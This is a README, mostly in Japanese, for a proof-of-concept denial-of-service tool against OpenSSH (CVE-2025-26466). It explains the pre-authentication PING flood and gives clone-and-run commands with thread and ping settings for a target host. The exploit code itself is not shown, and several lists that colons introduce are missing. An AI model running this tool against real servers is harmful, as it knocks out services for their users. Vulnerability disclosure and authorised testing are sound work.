
CVE-2025-26466 OpenSSH SSH2_MSG_PING DoS PoC
免責事項: このコードは教育目的および許可されたセキュリティテスト専用です。無許可で他人のシステムを攻撃することは違法です。
CVE-2025-26466 は、OpenSSH における事前認証型サービス拒否 (DoS) の脆弱性であり、鍵交換 (Key Exchange) の完了前に SSH サーバーを過負荷にすることができます。
サーバーは、認証された接続が存在しないにもかかわらず、初期ハンドシェイク中に SSH2_MSG_PING パケット (メッセージタイプ 192) を受け入れます。これにより、以下が発生します:
# Repository klonen
git clone https://github.com/acidboonrs/cve-2025-26466-openssh-poc.git
cd cve-2025-26466-openssh-poc
# Berechtigung für Ausführung (optional)
chmod +x poc.py
追加の依存関係は不要です (標準ライブラリのみ)。
python3 poc.py 192.168.1.10
python3 poc.py <ziel-host> [port] [threads] [pings]
パラメータ:
<ziel-host> - 対象 IP またはホスト名 (必須)[port] - SSH ポート (デフォルト: 22)[threads] - 並列接続数 (デフォルト: 10)[pings] - 接続ごとの PING 数 (デフォルト: 500)# Standard: localhost, Port 22, 10 Threads, 500 PINGs
python3 poc.py localhost
# Erhöhte Last: 50 Threads, 1000 PINGs
python3 poc.py 192.168.1.10 22 50 1000
# Custom Port
python3 poc.py example.com 2222 20 800
MIT ライセンス - 詳細は LICENSE を参照
この PoC は以下の理由で公開されています:
このコードを使用してよいのは、次の場合のみです:
無許可の DoS 攻撃は処罰の対象となります!
著者: Vollassiliz (voidcall.dev)
作成日: 2025-01-29